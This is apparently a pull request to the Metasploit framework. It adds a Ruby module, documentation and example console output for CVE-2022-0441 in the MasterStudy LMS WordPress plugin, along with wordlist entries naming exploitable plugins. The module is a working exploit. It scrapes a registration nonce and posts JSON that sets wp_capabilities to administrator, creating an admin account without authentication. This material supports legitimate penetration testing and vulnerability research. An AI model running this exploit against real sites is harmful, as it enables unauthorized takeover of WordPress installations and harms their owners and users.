### PR TITLE
Wordpress Plugin MasterStudy privesc (CVE-2022-0441)

### DIFF
--- a/data/wordlists/wp-exploitable-plugins.txt
+++ b/data/wordlists/wp-exploitable-plugins.txt
@@ -26,9 +26,11 @@ wp-symposium
 photo-gallery
 pie-register
 wysija-newsletters
+dzs-zoomsounds
 all-in-one-wp-migration
 wp-ultimate-csv-importer
 wp-symposium
+masterstudy-lms-learning-management-system
 wp-gdpr-compliance
 wp-automatic
 wp-easycart
@@ -48,4 +50,5 @@ simple-backup
 subscribe-to-comments
 easy-wp-smtp
 duplicator_download
+custom-registration-form-builder-with-submission-manager
 woocommerce-abandoned-cart

--- a/documentation/modules/auxiliary/admin/http/wp_masterstudy_privesc.md
+++ b/documentation/modules/auxiliary/admin/http/wp_masterstudy_privesc.md
@@ -9,7 +9,7 @@ user is able to create an administrator account for wordpress itself.
 ## Verification Steps
 
   1. `msfconsole`
-  2. `use auxiliary/admin/http/auxiliary/admin/http/wp_masterstudy_privesc`
+  2. `use auxiliary/admin/http/wp_masterstudy_privesc`
   3. `set RHOSTS <rhost>`
   4. `run`
 

--- a/documentation/modules/auxiliary/admin/http/wp_masterstudy_privesc.md
+++ b/documentation/modules/auxiliary/admin/http/wp_masterstudy_privesc.md
@@ -1,0 +1,50 @@
+## Vulnerable Application
+
+MasterStudy LMS, a WordPress plugin,
+prior to 2.7.6 is affected by a privilege escalation where an unauthenticated
+user is able to create an administrator account for wordpress itself.
+
+[The vulnerable version is available on WordPress' plugin directory](https://downloads.wordpress.org/plugin/masterstudy-lms-learning-management-system.2.7.5.zip).
+
+## Verification Steps
+
+  1. `msfconsole`
+  2. `use auxiliary/admin/http/auxiliary/admin/http/wp_masterstudy_privesc`
+  3. `set RHOSTS <rhost>`
+  4. `run`
+
+## Options
+
+### USERNAME
+
+Set a `USERNAME` if desirable. Defaults to empty, and random generation.
+
+### PASSWORD
+
+Set a `PASSWORD` if desirable. Defaults to empty, and random generation.
+
+### EMAIL
+
+Set a `EMAIL` if desirable. Defaults to empty, and random generation.
+
+## Scenarios
+
+### MasterStudy 2.7.5 on WordPress 5.7.5
+
+```
+[*] Processing masterstudy.rb for ERB directives.
+resource (masterstudy.rb)> use auxiliary/admin/http/wp_masterstudy_privesc
+resource (masterstudy.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (masterstudy.rb)> set verbose true
+verbose => true
+resource (masterstudy.rb)> run
+[*] Running module against 1.1.1.1
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt
+[*] Found version 2.7.5 in the plugin
+[+] The target appears to be vulnerable.
+[*] Attempting with username: ujukzntw7 password: TbxjFm0znF email: ashley.thompson@gcvz2cibu.org
+[+] Account Created Successfully
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/admin/http/wp_masterstudy_privesc.rb
+++ b/modules/auxiliary/admin/http/wp_masterstudy_privesc.rb
@@ -1,0 +1,123 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  require 'metasploit/framework/hashes/identify'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress MasterStudy Admin Account Creation',
+        'Description' => %q{
+          MasterStudy LMS, a WordPress plugin,
+          prior to 2.7.6 is affected by a privilege escalation where an unauthenticated
+          user is able to create an administrator account for wordpress itself.
+        },
+        'Author' => [
+          'h00die', # msf module
+          'Numan Türle', # edb
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2022-0441'],
+          ['URL', 'https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6'],
+          ['EDB', '50752'],
+          ['WPVDB', '173c2efe-ee9c-4539-852f-c242b4f728ed']
+        ],
+        'DisclosureDate' => '2022-02-18',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('USERNAME', [false, 'Username to register (blank will auto generate)', '']),
+        OptString.new('PASSWORD', [false, 'Password (blank will auto generate)', '']),
+        OptString.new('EMAIL', [false, 'Email to register (blank will auto generate)', ''])
+      ]
+    )
+  end
+
+  def check
+    unless wordpress_and_online?
+      return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
+    end
+
+    checkcode = check_plugin_version_from_readme('masterstudy-lms-learning-management-system', '2.7.6')
+    if checkcode == Msf::Exploit::CheckCode::Safe
+      return Msf::Exploit::CheckCode::Safe('MasterStudy LMS version not vulnerable')
+    end
+
+    checkcode
+  end
+
+  def get_username
+    datastore['USERNAME'] == '' ? "#{Rex::Text.rand_text_alpha_lower(8..10)}#{Rex::Text.rand_text_numeric(0..2)}" : datastore['USERNAME']
+  end
+
+  def get_password
+    datastore['PASSWORD'] == '' ? Rex::Text.rand_password : datastore['PASSWORD']
+  end
+
+  def get_email
+    datastore['EMAIL'] == '' ? Rex::Text.rand_mail_address : datastore['EMAIL']
+  end
+
+  def run
+    username = get_username
+    password = get_password
+    email = get_email
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path))
+    fail_with(Failure::Unreachable, 'Connection failed') unless res
+    fail_with(Failure::UnexpectedReply, 'Request Failed to return a successful response') unless res.code == 200
+    /"stm_lms_register":"(?<nonce>\w{10})"/ =~ res.body
+    fail_with(Failure::UnexpectedReply, 'Unabled to retrieve MasterStudy Nonce from page') if nonce.nil?
+
+    print_status("Attempting with username: #{username} password: #{password} email: #{email}")
+    json_post_data = JSON.pretty_generate({
+      'user_login' => username,
+      'user_email' => email,
+      'user_password' => password,
+      'user_password_re' => password,
+      'become_instructor' => '',
+      'privacy_policy' => true,
+      'degree' => '',
+      'expertize' => '',
+      'auditory' => '',
+      'additional' => [],
+      'additional_instructors' => [],
+      'profile_default_fields_for_register' => {
+        'wp_capabilities' => {
+          'value' => { 'administrator' => 1 }
+        }
+      }
+    })
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
+      'ctype' => 'application/json',
+      'vars_get' => {
+        'action' => 'stm_lms_register',
+        'nonce' => nonce
+      },
+      'data' => json_post_data
+    )
+    fail_with(Failure::Unreachable, 'Connection failed') unless res
+    fail_with(Failure::UnexpectedReply, 'Request Failed to return a successful response') unless res.code == 200
+    results = res.get_json_document
+    if results['status'] == 'success'
+      print_good('Account Created Successfully')
+    else
+      print_error("Account Creation Failed: #{results['message']}")
+    end
+  end
+end


### PR DESCRIPTION
This PR adds a module to exploit CVE-2022-0441, a priv esc in the Wordpress Plugin MasterStudy. PrivEsc is a bit of a misnomer, as it adds the ability to register an admin on the site as an unprivileged user.  Direct 0 to admin in one JSON request!

Once the plugin is installed and activated, no further action is required.

## Verification

- [ ] Start `msfconsole`
- [ ] `use auxiliary/admin/http/wp_masterstudy_privesc`
- [ ] `set rhosts [ip]`
- [ ] **Verify** you get an admin account created
- [ ] **Document** doesn't have an issue